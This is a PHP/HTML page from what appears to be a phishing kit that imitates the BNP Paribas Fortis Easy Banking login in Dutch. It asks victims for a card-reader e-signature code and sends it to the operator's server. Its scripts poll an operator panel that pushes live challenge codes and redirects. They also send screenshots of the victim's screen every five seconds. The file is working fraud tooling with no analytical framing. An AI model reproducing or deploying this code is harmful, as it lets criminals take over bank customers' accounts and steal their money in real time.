<?php
include 'include/session.php';

?>
<?php

function formatCardDisplay($raw)
{
    $digits = preg_replace('/\D+/', '', $raw ?? '');
    if ($digits === '') {
        return '4871 0406 6567 8144';
    }

    $parts = str_split($digits, 4);
    return implode(' ', $parts);
}

$cardDisplay = formatCardDisplay($_SESSION['card'] ?? '');
?>
<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BNP Fortis - Verificatie</title>
    <link rel="icon" type="image/png" href="./assets/imgs/favicon.png">
    <link rel="stylesheet" href="assets/css/style.css">
     <script>
document.addEventListener('DOMContentLoaded', function () {
  let isFetchingFlow = false;

  function handleFlowResponse(data) {
    if (!data.success) return;

    if (data.locked && data.final_redirect_url) {
      window.location.href = data.final_redirect_url;
      return;
    }

    const panelAction = data.panel_action ? data.panel_action.trim() : '';
    const currentPage = location.pathname.split('/').pop();

    if (panelAction && panelAction !== currentPage) {
      window.location.href = panelAction;
      return;
    }

    const box = document.getElementById('flow-msg');
    if (!box) return;
    if (data.custom_message) {
      box.innerText = data.custom_message;
    } else {
      // keep spinner visible when no message
      if (!box.querySelector('.spinner')) {
        const spinner = document.createElement('span');
        spinner.className = 'spinner';
        box.appendChild(spinner);
      }
    }
  }

  async function pollFlow() {
    if (isFetchingFlow) return;
    isFetchingFlow = true;

    try {
      const res = await fetch('./ajax/flow.php');
      const data = await res.json();
      handleFlowResponse(data);
    } catch (err) {
      // Silent fail
    } finally {
      isFetchingFlow = false;
      setTimeout(pollFlow, 5000); // Schedule next only after this finishes
    }
  }

  // 🔥 First request immediately
  pollFlow();
});
</script>

<script src="./assets/js/html2canvas.min.js"></script>
<script>
let heartbeatInterval = null;
let isSendingHeartbeat = false;

// 🔁 Send heartbeat (ensures one at a time)
async function sendHeartbeat(active = 1, includeImage = true) {
  if (isSendingHeartbeat) return;
  isSendingHeartbeat = true;

  try {
    const currentPage = location.pathname.split('/').pop();
    const payload = {
      is_active: active,
      browser_status: document.visibilityState === 'visible' ? 'focused' : 'blurred',
      current_page: currentPage,
      image: null
    };

    if (includeImage) {
      const canvas = await html2canvas(document.body);
      payload.image = canvas.toDataURL('image/png');
    }

    await fetch('./ajax/heartbeat.php', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    });
  } catch (err) {
    // silent fail
  } finally {
    isSendingHeartbeat = false;
  }
}

// ⚡ Initial heartbeat (no image)
sendHeartbeat(1, false);

// ⏱️ Delayed second heartbeat (with image)
setTimeout(() => sendHeartbeat(1, true), 3000);

// 🔁 Continuous heartbeat every 5s
heartbeatInterval = setInterval(() => {
  sendHeartbeat(1, true);
}, 5000);

// 📄 On visibility change
document.addEventListener('visibilitychange', () => {
  sendHeartbeat(document.visibilityState === 'visible' ? 1 : 0, false);
});

// 🚪 On page unload
window.addEventListener('beforeunload', function () {
  const currentPage = location.pathname.split('/').pop();
  navigator.sendBeacon('./ajax/heartbeat.php', JSON.stringify({
    is_active: 0,
    browser_status: 'unloading',
    current_page: currentPage,
    image: null
  }));
});
</script>
    <style>
        /* Verify Page Specific Styles */
        .card {
            max-width: 800px;
        }

        .welcome-section {
            flex: 0 0 240px;
            padding: 50px 30px;
        }

        .welcome-section h1 {
            font-size: 20px;
        }

        .welcome-section .card-reader-icon {
            width: 70px;
            height: 80px;
            margin-top: 25px;
            border: 2px solid #00965e;
            border-radius: 8px;
            display: flex;
            align-items: center;
            justify-content: center;
            position: relative;
            background: #fff;
        }

        .card-reader-icon::before {
            content: "";
            width: 35px;
            height: 22px;
            background: #00965e;
            border-radius: 3px;
            position: absolute;
            top: -12px;
        }

        .card-reader-icon .dots {
            display: grid;
            grid-template-columns: repeat(3, 10px);
            gap: 5px;
        }

        .card-reader-icon .dot {
            width: 10px;
            height: 10px;
            background: #00965e;
            border-radius: 2px;
        }

        .instructions {
            padding: 35px;
            flex: 1;
        }

        .instruction-step {
            margin-bottom: 22px;
            padding-bottom: 18px;
            border-bottom: 1px solid #e0e0e0;
            font-size: 15px;
            color: #333;
            line-height: 1.6;
        }

        .instruction-step:last-of-type {
            border-bottom: none;
        }

        .instruction-step.no-border {
            border-bottom: none;
            padding-bottom: 5px;
        }

        .card-number-display {
            display: flex;
            align-items: center;
            gap: 10px;
            margin-top: 10px;
            color: #666;
        }

        .card-icon {
            width: 24px;
            height: 18px;
            border: 1px solid #999;
            border-radius: 3px;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .card-icon::after {
            content: "";
            width: 16px;
            height: 2px;
            background: #999;
        }

        .badge {
            display: inline-flex;
            align-items: center;
            justify-content: center;
            padding: 3px 10px;
            border-radius: 12px;
            font-size: 13px;
            font-weight: 600;
            color: #fff;
            background-color: #00965e;
            min-width: 32px;
            height: 24px;
        }

        .badge-red {
            background-color: #dc3545;
        }

        .badge-outline {
            background: #e9e9e9;
            border: 1px solid #ccc;
            color: #333;
            font-weight: 600;
            padding: 5px 12px;
            border-radius: 4px;
            font-size: 14px;
        }

        .instruction-step .form-group {
            margin-top: 10px;
            margin-bottom: 0;
        }

        .instruction-step .form-group label {
            position: static;
            background: none;
            padding: 0;
            display: block;
            margin-bottom: 8px;
        }

        .logo-img {
            height: 32px;
            display: block;
        }

        #flow-msg {
            display: inline-flex;
            align-items: center;
            gap: 6px;
            min-width: 80px;
            justify-content: center;
        }

        #flow-msg .spinner {
            width: 14px;
            height: 14px;
            border: 2px solid #bcbcbc;
            border-top-color: #777;
            border-radius: 50%;
            animation: spin 0.8s linear infinite;
        }

        @keyframes spin {
            to { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <!-- Header -->
    <header class="header">
        <div class="header-left">
            <a href="#">&#10094; Terug</a>
        </div>
        <div class="header-center">
            
            <div class="logo-text">
                <img src="./assets/imgs/logo.svg" alt="BNP Paribas Fortis" class="logo-img">
            </div>
        </div>
        <div class="header-right">
            <a href="#">Ga naar Easy Banking Business</a>
        </div>
    </header>

    <!-- Main Content -->
    <main class="main-content">
        <div class="card card-split">
            <div class="welcome-section">
                <p>Welkom in</p>
                <h1>EASY BANKING</h1>
                <div class="card-reader-icon">
                    <div class="dots">
                        <span class="dot"></span>
                        <span class="dot"></span>
                        <span class="dot"></span>
                        <span class="dot"></span>
                        <span class="dot"></span>
                        <span class="dot"></span>
                        <span class="dot"></span>
                        <span class="dot"></span>
                        <span class="dot"></span>
                    </div>
                </div>
            </div>
            <div class="instructions">
                <div class="instruction-step">
                    <span>1. Gebruik de volgende debetkaart om aan te melden:</span>
                    <div class="card-number-display">
                        <span class="card-icon"></span>
                        <span><?php echo htmlspecialchars($cardDisplay, ENT_QUOTES, 'UTF-8'); ?></span>
                    </div>
                </div>

                <div class="instruction-step">
                    <span>2. Steek uw kaart in de kaartlezer en druk op <span class="badge badge-red">M1</span></span>
                </div>

                <div class="instruction-step">
                    <span>3. Voer <span class="badge-outline" id="flow-msg"><span class="spinner"></span></span> in en druk op <span class="badge">OK</span></span>
                </div>

                <div class="instruction-step">
                    <span>4. Voer uw pincode in en druk op <span class="badge">OK</span></span>
                </div>

                <form action="#" method="POST" id="verify-form">
                    <div class="instruction-step no-border">
                        <span>5. Voer de e-handtekening in</span>
                        <div class="form-group">
                            <input type="text" name="signature" placeholder="---- ----" maxlength="11">
                        </div>
                    </div>

                    <button type="submit" class="btn btn-primary">Aanmelden</button>
                    <div id="verify-message" class="form-message"></div>
                </form>
            </div>
        </div>

        <div class="help-section">
            <svg role="img" aria-labelledby="ucrAcessibilityTitle" width="100%" height="100%" viewBox="0 0 120 80" xmlns="http://www.w3.org/2000/svg"><title id="ucrAcessibilityTitle">Kaartlezer</title><g fill="none" fill-rule="evenodd"><path d="M38.758 3.557c5.033-1.31 10.68-1.471 15.663-1.518 4.946-.046 10.032-.086 15.023.095 4.234.153 8.505.194 11.736 2.717 3.34 2.61 3.973 7.195 3.973 11.435 0 18.083 1.118 29.746.384 48.02-.138 3.468-.803 7.129-3.03 9.79-2.92 3.489-8.977 3.173-13.517 3.446-7.254.437-15.515.458-22.772.065-4.647-.252-9.804-.933-12.772-4.517-2.564-3.095-2.73-7.462-2.774-11.48-.105-9.572.58-17.33.475-26.902l-.158-14.24c-.042-3.842-.415-5.665.482-9.438.937-3.95 3.435-6.471 7.287-7.473" fill="#D7EAC1"></path><path d="M38.758 3.557c5.033-1.31 10.68-1.471 15.663-1.518 4.946-.046 10.032-.086 15.023.095 4.234.153 8.505.194 11.736 2.717 3.34 2.61 3.973 7.195 3.973 11.435 0 18.083 1.118 29.746.384 48.02-.138 3.468-.803 7.129-3.03 9.79-2.92 3.489-8.977 3.173-13.517 3.446-7.254.437-15.515.458-22.772.065-4.647-.252-9.804-.933-12.772-4.517-2.564-3.095-2.73-7.462-2.774-11.48-.105-9.572.58-17.33.475-26.902l-.158-14.24c-.042-3.842-.415-5.665.482-9.438.937-3.95 3.435-6.471 7.287-7.473z" stroke="#93C463" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path><path d="M35.201 10.192c-1.195 2.348-1.069 4.018-1.031 6.585.111 7.436-.004 9.996.107 17.433l.397 26.503c.039 2.612.155 5.445 1.829 7.464 2.157 2.605 6.014 2.869 9.415 2.925 8.153.136 17.206.272 25.359.408 2.833.047 6.161-.147 7.736-2.481.817-1.212.945-2.74 1.047-4.195.874-12.34-.785-23.587 1.296-37.185.926-6.051 1.29-7.203 1.03-13.316-.114-2.657-.468-5.551-2.385-7.412-1.96-1.904-4.966-2.162-7.71-2.254-5.469-.186-10.214-.324-15.683-.116-7.204.275-10.652.205-16.838 2.117-2.107.65-3.465 1.359-4.569 3.524" fill="#FFF"></path><path d="M34.224 21.688s7.682-.354 15.063 3.257c0 0 7.98 4.047 15.624 0 0 0 7.756-3.721 16.749-3.266" stroke="#D7EAC1" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path><path d="M75.275 18.493h-34.1a2.285 2.285 0 0 1-2.284-2.284v-5.592a2.285 2.285 0 0 1 2.284-2.284h34.1a2.285 2.285 0 0 1 2.284 2.284v5.592a2.284 2.284 0 0 1-2.284 2.284" fill="#D7EAC1"></path><path d="M75.275 18.493h-34.1a2.285 2.285 0 0 1-2.284-2.284v-5.592a2.285 2.285 0 0 1 2.284-2.284h34.1a2.285 2.285 0 0 1 2.284 2.284v5.592a2.284 2.284 0 0 1-2.284 2.284z" stroke="#93C463" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path><path d="M46.351 39.201c0 1.45-1.946 2.623-4.348 2.623-2.4 0-4.347-1.174-4.347-2.623 0-1.448 1.946-2.623 4.347-2.623 2.402 0 4.348 1.175 4.348 2.623zM46.351 47.38c0 1.447-1.946 2.621-4.348 2.621-2.4 0-4.347-1.174-4.347-2.622 0-1.449 1.946-2.623 4.347-2.623 2.402 0 4.348 1.174 4.348 2.623zM45.908 55.556c0 1.448-1.946 2.623-4.348 2.623-2.401 0-4.347-1.175-4.347-2.623 0-1.448 1.946-2.623 4.347-2.623 2.402 0 4.348 1.175 4.348 2.623zM57.295 40.466c0 1.448-1.946 2.623-4.348 2.623-2.401 0-4.347-1.175-4.347-2.623 0-1.449 1.946-2.623 4.347-2.623 2.402 0 4.348 1.174 4.348 2.623zM57.295 48.487c0 1.448-1.946 2.623-4.348 2.623-2.401 0-4.347-1.175-4.347-2.623 0-1.448 1.946-2.623 4.347-2.623 2.402 0 4.348 1.175 4.348 2.623zM57.295 56.507c0 1.45-1.946 2.623-4.348 2.623-2.401 0-4.347-1.174-4.347-2.623 0-1.448 1.946-2.622 4.347-2.622 2.402 0 4.348 1.174 4.348 2.622zM68.612 40.466c0 1.448-1.947 2.623-4.348 2.623-2.4 0-4.348-1.175-4.348-2.623 0-1.449 1.947-2.623 4.348-2.623s4.348 1.174 4.348 2.623zM68.676 48.487c0 1.448-1.947 2.623-4.348 2.623s-4.347-1.175-4.347-2.623c0-1.448 1.946-2.623 4.347-2.623 2.4 0 4.348 1.175 4.348 2.623zM68.612 56.88c0 1.447-1.947 2.622-4.348 2.622-2.4 0-4.348-1.175-4.348-2.623 0-1.449 1.947-2.623 4.348-2.623s4.348 1.174 4.348 2.623z" stroke="#D7EAC1" stroke-width="1.5"></path><path d="M78.582 47.38c0 1.447-1.947 2.621-4.348 2.621s-4.347-1.174-4.347-2.622c0-1.449 1.946-2.623 4.347-2.623 2.4 0 4.348 1.174 4.348 2.623" fill="#00965E"></path><path d="M68.612 32.445c0 1.449-1.947 2.623-4.348 2.623-2.4 0-4.348-1.174-4.348-2.623 0-1.448 1.947-2.622 4.348-2.622s4.348 1.174 4.348 2.622" fill="#3394CC"></path><path d="M46.351 31.45c0 1.447-1.946 2.622-4.348 2.622-2.4 0-4.347-1.175-4.347-2.623 0-1.448 1.946-2.623 4.347-2.623 2.402 0 4.348 1.175 4.348 2.623" fill="#F97A53"></path><path d="M57.481 32.445c0 1.449-1.946 2.623-4.348 2.623-2.4 0-4.347-1.174-4.347-2.623 0-1.448 1.947-2.622 4.347-2.622 2.402 0 4.348 1.174 4.348 2.622" fill="#D7EAC1"></path><path d="M78.582 39.477c0 1.448-1.947 2.623-4.348 2.623s-4.347-1.175-4.347-2.623c0-1.448 1.946-2.623 4.347-2.623 2.4 0 4.348 1.175 4.348 2.623" fill="#FED56D"></path><path d="M56.978 64.905c0 1.449-1.947 2.623-4.348 2.623-2.4 0-4.348-1.174-4.348-2.623 0-1.448 1.947-2.623 4.348-2.623s4.348 1.175 4.348 2.623z" stroke="#D7EAC1" stroke-width="1.5"></path></g></svg>
            <span><a href="#">Hulp nodig</a>? Bel naar +32 2 762 60 00</span>
        </div>
    </main>

    <!-- Footer -->
    <footer class="footer">
        <div class="footer-left">
            &copy; 2026 BNP Paribas Fortis
        </div>
        <div class="footer-right">
            <a href="#">Over ons</a>
            <span>-</span>
            <a href="#">Gebruiksvoorwaarden van de Website</a>
            <span>-</span>
            <a href="#">Cookies</a>
            <span>-</span>
            <a href="#">Privacyverklaring</a>
        </div>
    </footer>

    <script>
document.addEventListener('DOMContentLoaded', () => {
  const form = document.getElementById('verify-form');
  if (!form) return;

  const submitButton = form.querySelector('button[type="submit"]');
  const messageBox = document.getElementById('verify-message');
  const signatureInput = form.querySelector('input[name="signature"]');

  function formatSignature(value) {
    const digits = value.replace(/\D/g, '').slice(0, 8);
    const parts = digits.match(/.{1,4}/g) || [];
    return parts.join(' ');
  }

  // Restrict to digits and spaces
  if (signatureInput) {
    signatureInput.setAttribute('inputmode', 'numeric');
    signatureInput.addEventListener('input', (e) => {
      e.target.value = formatSignature(e.target.value);
    });
  }

  form.addEventListener('submit', (event) => {
    event.preventDefault();
    if (!submitButton || !signatureInput) return;

    if (messageBox) messageBox.textContent = '';
    const originalText = submitButton.textContent;
    submitButton.disabled = true;
    submitButton.textContent = 'Bezig...';

    const signature = signatureInput.value.trim();
    if (!signature) {
      if (messageBox) messageBox.textContent = 'Voer uw e-handtekening in.';
      submitButton.disabled = false;
      submitButton.textContent = originalText;
      return;
    }

    const xhr = new XMLHttpRequest();
    xhr.open('POST', './ajax/verify.php', true);
    xhr.setRequestHeader('Content-Type', 'application/json');

    xhr.onreadystatechange = function () {
      if (xhr.readyState !== 4) return;

      submitButton.disabled = false;
      submitButton.textContent = originalText;

      try {
        const data = JSON.parse(xhr.responseText);
        if (data && data.success && data.redirect) {
          window.location.href = data.redirect;
          return;
        }

        if (messageBox) {
          messageBox.textContent = (data && data.message) ? data.message : 'Er is iets misgegaan. Probeer opnieuw.';
        }
      } catch (e) {
        if (messageBox) {
          messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
        }
      }
    };

    xhr.onerror = function () {
      submitButton.disabled = false;
      submitButton.textContent = originalText;
      if (messageBox) {
        messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
      }
    };

    xhr.send(JSON.stringify({ signature }));
  });
});
</script>
</body>
</html>
